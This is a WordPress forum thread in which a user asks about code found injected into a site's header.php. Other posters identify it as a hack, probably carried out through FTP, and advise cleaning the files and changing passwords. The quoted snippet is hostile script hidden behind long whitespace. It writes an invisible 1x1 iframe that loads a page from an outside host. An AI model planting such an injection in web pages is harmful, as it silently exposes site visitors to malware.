f1930e mystery (5 posts)

  1. ciastko666
    Posted 2 years ago #

    few days ago my friend found this on his header.php's files:

                                                                                                                                                                                                                                                                                                                                                                          if(!$srvc_counter) {
    echo "                                                                                                                                                                                                                                                                                                                                                                      <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                      (function () {    var kgzd = document.createElement('iframe');    kgzd.src = 'http://test.giessepromotion.it/cms/relay.php';    kgzd.style.position = 'absolute';    kgzd.style.border = '0';    kgzd.style.height = '1px';    kgzd.style.width = '1px';    kgzd.style.left = '1px';    kgzd.style.top = '1px';    if (!document.getElementById('kgzd')) {        document.write('<div id=\'kgzd\' ></div>');        document.getElementById('kgzd').appendChild(kgzd);    }})();</script>";
    $srvc_counter = true;

    do anyone know what it is ?

  2. ClaytonJames
    Posted 2 years ago #

  3. ciastko666
    Posted 2 years ago #

    one more thing
    my friend said that's probably weak attack, because this code appear on the top of website.
    In fact, I found many other sites with same hack, and in code view this strange js-code is placed in quotation marks

  4. ClaytonJames
    Posted 2 years ago #

    I'm not sure if there is another question there or not, but there is no such thing as a weak attack. There is successful, and there is unsuccessful. Nothing in between. It needs to be treated like you woke up one morning and found a stranger standing in your kitchen eating your food.

  5. Jim Westergren
    Posted 2 years ago #

    I got the same thing and investigated. The hacker accesses your files via FTP. So clean your files and change all passwords including for the FTP, MySQL and WP. Assume the hacker has downloaded your files including wp-config.php.

Topic Closed

This topic has been closed to new replies.

About this Topic